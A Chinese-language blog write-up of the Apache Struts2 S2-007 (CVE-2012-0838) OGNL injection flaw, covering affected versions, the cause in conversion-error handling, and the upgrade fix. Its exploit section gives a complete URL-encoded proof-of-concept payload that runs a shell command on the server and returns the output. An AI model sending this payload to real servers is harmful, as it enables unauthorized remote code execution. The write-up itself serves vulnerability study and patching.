标签:
catalog
1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix
1. Description
S2-007和S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞,导致黑客可以通过OGNL表达式实现代码注入和执行,所不同的是
1. S2-003、S2-005: 通过OGNL的name-value的赋值解析过程、#访问全局静态变量(AOP思想)实现代码执行 2. S2-007: 通过OGNL中String向long转换过程实现代码执行 //即它们的攻击向量是不同的
User input is evaluated as an OGNL expression when there‘s a conversion error. This allows a malicious user to execute arbitrary code.
关于struts2 OGNL的相关知识,请参阅另一篇文章
http://www.cnblogs.com/LittleHann/p/4614488.html //搜索:5. struts2 OGNL表达式
Relevant Link:
http://struts.apache.org/docs/s2-007.html http://cve.scap.org.cn/CVE-2012-0838.html
2. Effected Scope
Struts 2.0.0 - Struts 2.2.3
3. Exploit Analysis
0x1: POC
id=‘%2b(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="ifconfig",%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo))%2b‘
4. Principle Of Vulnerability
Apache Struts 2.2.3.1之前的2版本中存在漏洞,该漏洞源于在处理转换错误时评估字符串为OGNL表达式。远程攻击者可利用此漏洞借助无效的输入,修改run-time数据值,进而执行任意代码
5. Patch Fix
0x1: upgrade struts2
It is strongly recommended to upgrade to Struts 2.3.1.1, which contains the corrected classes.
Relevant Link:
Copyright (c) 2015 Little5ann All rights reserved
struts2 CVE-2012-0838 S2-007 Remote Code Execution
标签:
原文地址:http://www.cnblogs.com/LittleHann/p/4640789.html
